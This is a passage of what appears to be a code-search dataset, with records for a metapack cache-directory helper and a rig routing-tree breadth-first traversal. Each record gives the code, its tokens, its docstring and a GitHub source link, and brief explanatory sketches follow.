from metapack.constants import MATERIALIZED_DATA_PREFIX
from os.path import join
if not doc:
from metapack import Downloader
downloader = Downloader()
return downloader.cache.getsyspath(MATERIALIZED_DATA_PREFIX)
else:
dr = doc._cache.getsyspath(join(MATERIALIZED_DATA_PREFIX, doc.name))
ensure_dir(dr)
return dr | [
"def",
"get_materialized_data_cache",
"(",
"doc",
"=",
"None",
")",
":",
"from",
"metapack",
".",
"constants",
"import",
"MATERIALIZED_DATA_PREFIX",
"from",
"os",
".",
"path",
"import",
"join",
"if",
"not",
"doc",
":",
"from",
"metapack",
"import",
"Downloader",
"downloader",
"=",
"Downloader",
"(",
")",
"return",
"downloader",
".",
"cache",
".",
"getsyspath",
"(",
"MATERIALIZED_DATA_PREFIX",
")",
"else",
":",
"dr",
"=",
"doc",
".",
"_cache",
".",
"getsyspath",
"(",
"join",
"(",
"MATERIALIZED_DATA_PREFIX",
",",
"doc",
".",
"name",
")",
")",
"ensure_dir",
"(",
"dr",
")",
"return",
"dr"
] | Return the cache directory where data can be written during a build, usually for
a Jupyter notebook that generates many files for each execution | [
"Return",
"the",
"cache",
"directory",
"where",
"data",
"can",
"be",
"written",
"during",
"a",
"build",
"usually",
"for",
"a",
"Jupyter",
"notebook",
"that",
"generates",
"many",
"files",
"for",
"each",
"execution"
] | train | https://github.com/Metatab/metapack/blob/8365f221fbeaa3c0be9091f2eaf3447fd8e2e8d6/metapack/util.py#L339-L355 |
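get_materialized_data_cache namespaces the cache per package name so two documents built at once cannot clobber each other's files. A filesystem-only sketch of that layout; the prefix and names are placeholders for the real constants:

import os, tempfile

PREFIX = '_materialized_data'        # stand-in for MATERIALIZED_DATA_PREFIX

def data_cache(base, doc_name=None):
    parts = [base, PREFIX] + ([doc_name] if doc_name else [])
    path = os.path.join(*parts)
    os.makedirs(path, exist_ok=True)  # plays the role of ensure_dir
    return path

base = tempfile.mkdtemp()
print(data_cache(base, 'example-package-1'))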
project-rig/rig | rig/place_and_route/routing_tree.py | RoutingTree.traverse | def traverse(self):
"""Traverse the tree yielding the direction taken to a node, the
co-ordinates of that node and the directions leading from the Node.
Yields
------
(direction, (x, y), {:py:class:`~rig.routing_table.Routes`, ...})
Direction taken to reach a Node in the tree, the (x, y) co-ordinate
of that Node and routes leading to children of the Node.
"""
# A queue of (direction, node) to visit. The direction is the Links
# entry which describes the direction in which we last moved to reach
# the node (or None for the root).
to_visit = deque([(None, self)])
while to_visit:
direction, node = to_visit.popleft()
# Determine the set of directions we must travel to reach the
# children
out_directions = set()
for child_direction, child in node.children:
# Note that if the direction is unspecified, we simply
# (silently) don't add a route for that child.
if child_direction is not None:
out_directions.add(child_direction)
# Search the next steps of the route too
if isinstance(child, RoutingTree):
assert child_direction is not None
to_visit.append((child_direction, child))
# Yield the information pertaining to this Node
yield direction, node.chip, out_directions | python | def traverse(self):
"""Traverse the tree yielding the direction taken to a node, the
co-ordinates of that node and the directions leading from the Node.
Yields
------
(direction, (x, y), {:py:class:`~rig.routing_table.Routes`, ...})
Direction taken to reach a Node in the tree, the (x, y) co-ordinate
of that Node and routes leading to children of the Node.
"""
# A queue of (direction, node) to visit. The direction is the Links
# entry which describes the direction in which we last moved to reach
# the node (or None for the root).
to_visit = deque([(None, self)])
while to_visit:
direction, node = to_visit.popleft()
# Determine the set of directions we must travel to reach the
# children
out_directions = set()
for child_direction, child in node.children:
# Note that if the direction is unspecified, we simply
# (silently) don't add a route for that child.
if child_direction is not None:
out_directions.add(child_direction)
# Search the next steps of the route too
if isinstance(child, RoutingTree):
assert child_direction is not None
to_visit.append((child_direction, child))
# Yield the information pertaining to this Node
yield direction, node.chip, out_directions | [
"def",
"traverse",
"(",
"self",
")",
":",
"# A queue of (direction, node) to visit. The direction is the Links",
"# entry which describes the direction in which we last moved to reach",
"# the node (or None for the root).",
"to_visit",
"=",
"deque",
"(",
"[",
"(",
"None",
",",
"self",
")",
"]",
")",
"while",
"to_visit",
":",
"direction",
",",
"node",
"=",
"to_visit",
".",
"popleft",
"(",
")",
"# Determine the set of directions we must travel to reach the",
"# children",
"out_directions",
"=",
"set",
"(",
")",
"for",
"child_direction",
",",
"child",
"in",
"node",
".",
"children",
":",
"# Note that if the direction is unspecified, we simply",
"# (silently) don't add a route for that child.",
"if",
"child_direction",
"is",
"not",
"None",
":",
"out_directions",
".",
"add",
"(",
"child_direction",
")",
"# Search the next steps of the route too",
"if",
"isinstance",
"(",
"child",
",",
"RoutingTree",
")",
":",
"assert",
"child_direction",
"is",
"not",
"None",
"to_visit",
".",
"append",
"(",
"(",
"child_direction",
",",
"child",
")",
")",
"# Yield the information pertaining to this Node",
"yield",
"direction",
",",
"node",
".",
"chip",
",",
"out_directions"
] | Traverse the tree yielding the direction taken to a node, the
co-ordinates of that node and the directions leading from the Node.
Yields
------
(direction, (x, y), {:py:class:`~rig.routing_table.Routes`, ...})
Direction taken to reach a Node in the tree, the (x, y) co-ordinate
of that Node and routes leading to children of the Node. | [
"Traverse",
"the",
"tree",
"yielding",
"the",
"direction",
"taken",
"to",
"a",
"node",
"the",
"co",
"-",
"ordinates",
"of",
"that",
"node",
"and",
"the",
"directions",
"leading",
"from",
"the",
"Node",
"."
] | train | https://github.com/project-rig/rig/blob/3a3e053d3214899b6d68758685835de0afd5542b/rig/place_and_route/routing_tree.py#L96-L128 |
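RoutingTree.traverse is a plain breadth-first walk over a deque, emitting for each node the direction used to reach it plus the set of outgoing directions. A toy tree makes the three-tuple output concrete (MiniTree is a stand-in for rig's RoutingTree, and 'vertex' plays the role of a non-tree leaf object):

from collections import deque

class MiniTree:
    def __init__(self, chip, children=()):
        self.chip = chip
        self.children = list(children)  # (direction, child) pairs

def traverse(root):
    to_visit = deque([(None, root)])
    while to_visit:
        direction, node = to_visit.popleft()
        out = {d for d, _ in node.children if d is not None}
        for d, child in node.children:
            if isinstance(child, MiniTree):  # only recurse into tree nodes
                to_visit.append((d, child))
        yield direction, node.chip, out

leaf = MiniTree((1, 0))
root = MiniTree((0, 0), [('E', leaf), ('N', 'vertex')])
print(list(traverse(root)))
# [(None, (0, 0), {'E', 'N'}), ('E', (1, 0), set())]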